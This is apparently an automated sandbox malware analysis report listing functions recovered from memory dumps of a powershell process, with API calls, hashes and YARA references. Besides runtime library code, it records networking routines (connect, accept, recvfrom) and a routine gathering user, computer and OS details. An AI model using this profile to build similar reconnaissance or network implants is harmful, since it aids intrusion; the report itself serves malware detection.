Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
Instruction ID: 94d0cbf4c2ffddf6fa1d528a8e322a43ba6f223dc185dcd73a86be2e68100135
Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
Instruction Fuzzy Hash: 7F416D3A711A00CAEB20EFB9D5883DC2361E767B88F9901229E5957A69DF38C50DC342

Function 000001A6ED30621C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED30624E

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

__doserrno.LIBCMT ref: 000001A6ED306245

Part of subcall function 000001A6ED3010A8: _getptd_noexit.LIBCMT ref: 000001A6ED3010AC

__doserrno.LIBCMT ref: 000001A6ED3062AB
_errno.LIBCMT ref: 000001A6ED3062B2
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED306316

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 49b09f2d48ef8df8588a2b31a64592898f93a6aae785ba82b089c67bc61753ed
Instruction ID: ddf870b13bd8653e6f40b4dccad81cda7493dd15fabfd633d960a8a449e7376a
Opcode Fuzzy Hash: 49b09f2d48ef8df8588a2b31a64592898f93a6aae785ba82b089c67bc61753ed
Instruction Fuzzy Hash: 5E31223A302280C6E316EF6D98413ED2654A7A37E0FAD8129AA21573D7EA38C44DD352

Function 000001A6ED356E1C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED356E4E

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

__doserrno.LIBCMT ref: 000001A6ED356E45

Part of subcall function 000001A6ED351CA8: _getptd_noexit.LIBCMT ref: 000001A6ED351CAC

__doserrno.LIBCMT ref: 000001A6ED356EAB
_errno.LIBCMT ref: 000001A6ED356EB2
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED356F16

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
Instruction ID: ef728dd62a600dc18b95b309937c863e8b3b0a60a8925d8bbc2226de03588c10
Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
Instruction Fuzzy Hash: 7C31E43AB13690C6E716EF6DD8413ED3651ABA37A0FAD4215EA21177D3C738C849C712

Function 000001A6ED30F150 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED30F176
_errno.LIBCMT ref: 000001A6ED30F16B

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
Instruction ID: 99b6c2f0ecf48342d6199705de56e6e26b756e4b992acaf4687755a4c9428ee0
Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
Instruction Fuzzy Hash: 4C41E27D716251C2FB64EB2D85013EA73E4E777BE4F984221EA9443AC5F728C849C702

Function 000001A6ED35FD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED35FD76
_errno.LIBCMT ref: 000001A6ED35FD6B

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
Instruction ID: 22d32c0df0ad22e92118b65320bd7d60467159bbf19e7d401e6f083ff45f2865
Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
Instruction Fuzzy Hash: A841F57E703291C7FB60EB1995403ED37E1E777B94F9C4121EA90476CAD724C8698702

Function 000001A6ED35027C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED350264: _mtinitlocknum.LIBCMT ref: 000001A6ED353DAA
Part of subcall function 000001A6ED350264: _amsg_exit.LIBCMT ref: 000001A6ED353DB6

DecodePointer.KERNEL32 ref: 000001A6ED3502D8
DecodePointer.KERNEL32 ref: 000001A6ED3502F6
EncodePointer.KERNEL32 ref: 000001A6ED350324
DecodePointer.KERNEL32 ref: 000001A6ED350339
EncodePointer.KERNEL32 ref: 000001A6ED350344
DecodePointer.KERNEL32 ref: 000001A6ED350356
DecodePointer.KERNEL32 ref: 000001A6ED350366
__crtCorExitProcess.LIBCMT ref: 000001A6ED3503EA
ExitProcess.KERNEL32 ref: 000001A6ED3503F2

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
String ID:
API String ID: 1550138920-0
Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
Instruction ID: 046d6e5be29685b4979ba25ef1ce463172d26bc07de32524ed2d3d654f0c3996
Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
Instruction Fuzzy Hash: 51414A3D327A40D6E660DF19F940399A3A0F7ABBC4F4C0425AA8E537A5DF39C49D8702

Function 000001A6ED346500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 000001A6ED346541
htons.WS2_32 ref: 000001A6ED346552
socket.WS2_32 ref: 000001A6ED346594
closesocket.WS2_32 ref: 000001A6ED3465A9
gethostbyname.WS2_32 ref: 000001A6ED3465C8
htons.WS2_32 ref: 000001A6ED3465F8
ioctlsocket.WS2_32 ref: 000001A6ED346612
connect.WS2_32 ref: 000001A6ED34662A
WSAGetLastError.WS2_32 ref: 000001A6ED346634

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3339321253-0
Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
Instruction ID: b60269b8c1a4946ead0f10a1916c8c98440f852b8f14817213f52aeb42a4eeb9
Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
Instruction Fuzzy Hash: CB312239311680C2EB30DF29E9543EEA361F757B98F180124DE1A07298EE3CC64EC701

Function 000001A6ED346B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED346BE0: htonl.WS2_32 ref: 000001A6ED346C3D
Part of subcall function 000001A6ED346BE0: select.WS2_32 ref: 000001A6ED346CAB
Part of subcall function 000001A6ED346BE0: __WSAFDIsSet.WS2_32 ref: 000001A6ED346CC3
Part of subcall function 000001A6ED346BE0: accept.WS2_32 ref: 000001A6ED346CE0
Part of subcall function 000001A6ED346BE0: ioctlsocket.WS2_32 ref: 000001A6ED346CF8
Part of subcall function 000001A6ED346BE0: __WSAFDIsSet.WS2_32 ref: 000001A6ED346D9B

GetTickCount.KERNEL32 ref: 000001A6ED346BAA

Part of subcall function 000001A6ED346F2C: malloc.LIBCMT ref: 000001A6ED346F5E
Part of subcall function 000001A6ED346F2C: htonl.WS2_32 ref: 000001A6ED346F91
Part of subcall function 000001A6ED346F2C: recvfrom.WS2_32 ref: 000001A6ED346FD5
Part of subcall function 000001A6ED346F2C: WSAGetLastError.WS2_32 ref: 000001A6ED346FE2

GetTickCount.KERNEL32 ref: 000001A6ED346BC2
GetTickCount.KERNEL32 ref: 000001A6ED3470E0
GetTickCount.KERNEL32 ref: 000001A6ED3470F6
shutdown.WS2_32 ref: 000001A6ED347115
shutdown.WS2_32 ref: 000001A6ED34712A
closesocket.WS2_32 ref: 000001A6ED347134
free.LIBCMT ref: 000001A6ED347154
free.LIBCMT ref: 000001A6ED347169

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
String ID:
API String ID: 3610715900-0
Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
Instruction ID: 85c20a58e9c0caafe69189248aaf3a8aa7e453115e3bdeaa4130294a07bbec2d
Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
Instruction Fuzzy Hash: 2431A27D312A41C2EB60CF2AD9443AD23B0F76BB88F1C4125CA9947295DF3AC45AC743

Function 000001A6ED306E90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED306EBB

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

__doserrno.LIBCMT ref: 000001A6ED306EB3

Part of subcall function 000001A6ED3010A8: _getptd_noexit.LIBCMT ref: 000001A6ED3010AC

__lock_fhandle.LIBCMT ref: 000001A6ED306EFF
_lseek_nolock.LIBCMT ref: 000001A6ED306F18

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
String ID:
API String ID: 310312816-0
Opcode ID: 689ddd4190ac18ee6f3a072d0937668feab07145efaf470236796ea297ffc133
Instruction ID: 412bd5561fc4e4b2bec2e18ae32b46e70fa832739f54d2889fe971ba0685cc3f
Opcode Fuzzy Hash: 689ddd4190ac18ee6f3a072d0937668feab07145efaf470236796ea297ffc133
Instruction Fuzzy Hash: DF21323A702240C6F705EF2CD8413ED6650ABA37E1F6D8114BA15077D7EB788849D326

Function 000001A6ED307008 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED307033

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

__doserrno.LIBCMT ref: 000001A6ED30702B

Part of subcall function 000001A6ED3010A8: _getptd_noexit.LIBCMT ref: 000001A6ED3010AC

__lock_fhandle.LIBCMT ref: 000001A6ED307077
_lseeki64_nolock.LIBCMT ref: 000001A6ED307090

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
String ID:
API String ID: 4140391395-0
Opcode ID: 43d75af09cf974c8da12c00f0caf2e030efb182ec464fb3533e4fccbb0b59705
Instruction ID: 7aaff8d41532997499098cf742b243d4da6436db0e9932a92b856ce79fe957a2
Opcode Fuzzy Hash: 43d75af09cf974c8da12c00f0caf2e030efb182ec464fb3533e4fccbb0b59705
Instruction Fuzzy Hash: C821DE7A702240C1F705AF2D98053EDA651A7A3BF1F4DC304AA35073D3E73884498362

Function 000001A6ED357A90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED357ABB

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

__doserrno.LIBCMT ref: 000001A6ED357AB3

Part of subcall function 000001A6ED351CA8: _getptd_noexit.LIBCMT ref: 000001A6ED351CAC

__lock_fhandle.LIBCMT ref: 000001A6ED357AFF
_lseek_nolock.LIBCMT ref: 000001A6ED357B18

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
String ID:
API String ID: 310312816-0
Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
Instruction ID: 3c516d88013cbbc0f2baa1bf7d7b8b551497970a57579ef24255a124f61a6230
Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
Instruction Fuzzy Hash: 2A21F07A702680C6FB16EF6DD8413ED7692BBA37A1F1D4114AA150B3D3CBB888498353

Function 000001A6ED357C08 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED357C33

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

__doserrno.LIBCMT ref: 000001A6ED357C2B

Part of subcall function 000001A6ED351CA8: _getptd_noexit.LIBCMT ref: 000001A6ED351CAC

__lock_fhandle.LIBCMT ref: 000001A6ED357C77
_lseeki64_nolock.LIBCMT ref: 000001A6ED357C90

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
String ID:
API String ID: 4140391395-0
Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
Instruction ID: a3a58b679a082305660e9b8703ebeba84318d06abbca057bd576867ec8e70f4e
Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
Instruction Fuzzy Hash: 1121CF7A702580D6F716EB2D98053ED7652BBA3BB1F5D4714AE390B3D3C73884498722

Function 000001A6ED2FF36C Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000001A6ED2FF39A

Part of subcall function 000001A6ED2FE644: _errno.LIBCMT ref: 000001A6ED2FE664

free.LIBCMT ref: 000001A6ED2FF3AF
free.LIBCMT ref: 000001A6ED2FF3D0
free.LIBCMT ref: 000001A6ED2FF3E5
free.LIBCMT ref: 000001A6ED2FF3F9
free.LIBCMT ref: 000001A6ED2FF405
free.LIBCMT ref: 000001A6ED2FF430
free.LIBCMT ref: 000001A6ED2FF451
free.LIBCMT ref: 000001A6ED2FF46A
free.LIBCMT ref: 000001A6ED2FF49B

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
Instruction ID: 4b8bfbfb8214cbce064c67648406251ba8dd481b820b9c6799ebec1778d54a14
Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
Instruction Fuzzy Hash: 3E316C3DB03644C9FE95DB0DE9553E823A0AFB7B64F2C09259A1917295CF38C44C8387

Function 000001A6ED345E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED345FEC: malloc.LIBCMT ref: 000001A6ED346008

GetUserNameA.ADVAPI32 ref: 000001A6ED345EAF
GetComputerNameA.KERNEL32 ref: 000001A6ED345EC2
GetModuleFileNameA.KERNEL32 ref: 000001A6ED345EDB
strrchr.LIBCMT ref: 000001A6ED345EED
GetVersionExA.KERNEL32 ref: 000001A6ED345F10
_snprintf.LIBCMT ref: 000001A6ED345F9B

Strings

%s%s%s, xrefs: 000001A6ED345F7F

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
String ID: %s%s%s
API String ID: 1671524875-1891519693
Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
Instruction ID: 411e4a99ac7a7d3384d461fe624920f7044d01f171329d8cdaebc54afb0fb685
Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
Instruction Fuzzy Hash: 8D41A53D706240C6FA14FB2AAA147EE6791B7A7BD0F5C4221AE6547796CF3CC04AC702

Function 000001A6ED305834 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED30585F

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

__doserrno.LIBCMT ref: 000001A6ED305857

Part of subcall function 000001A6ED3010A8: _getptd_noexit.LIBCMT ref: 000001A6ED3010AC

__lock_fhandle.LIBCMT ref: 000001A6ED3058A3

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
String ID:
API String ID: 2611593033-0
Opcode ID: 9d586237cfbf1f9382404945b490824def90faa684bf5ba584bc382ccd0c9597
Instruction ID: e6e69c61f0953aba1f99e9cf639d835e4bc4c86b6dbae7cc1f84dd8506b08795
Opcode Fuzzy Hash: 9d586237cfbf1f9382404945b490824def90faa684bf5ba584bc382ccd0c9597
Instruction Fuzzy Hash: F121D436702240C6F705EF2D98413ED666067A3BE1F9D8215AE15473D3E7788449C763

Function 000001A6ED356434 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED35645F

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

__doserrno.LIBCMT ref: 000001A6ED356457

Part of subcall function 000001A6ED351CA8: _getptd_noexit.LIBCMT ref: 000001A6ED351CAC

__lock_fhandle.LIBCMT ref: 000001A6ED3564A3

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
String ID:
API String ID: 2611593033-0
Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
Instruction ID: ba442c84f49a6b28b1e562d6b92e6dc5ebf52929dc05253d047958734bbd03c4
Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
Instruction Fuzzy Hash: 6E21357AB02180C6F716EF2CD9413ED7651ABA3BA1F2D4124AA15073D3CB78C849C713

Function 000001A6ED35A73C Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED35A755

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

__lock_fhandle.LIBCMT ref: 000001A6ED35A79D
FlushFileBuffers.KERNEL32 ref: 000001A6ED35A7B8
GetLastError.KERNEL32 ref: 000001A6ED35A7C2
__doserrno.LIBCMT ref: 000001A6ED35A7D2
_errno.LIBCMT ref: 000001A6ED35A7D9

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
String ID:
API String ID: 2289611984-0
Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
Instruction ID: 0696ba71714eab6246b445b379715ab1183ccedebe25fdfeafdbeb22b03dd8d3
Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
Instruction Fuzzy Hash: 4821573D303681C5F715EFAC9C803EC2661ABA3764F1D0118DA220B3D2CB38D849A357

Function 000001A6ED305058 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED305079

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

__doserrno.LIBCMT ref: 000001A6ED305071

Part of subcall function 000001A6ED3010A8: _getptd_noexit.LIBCMT ref: 000001A6ED3010AC

__lock_fhandle.LIBCMT ref: 000001A6ED3050BD
_close_nolock.LIBCMT ref: 000001A6ED3050D0

Memory Dump Source

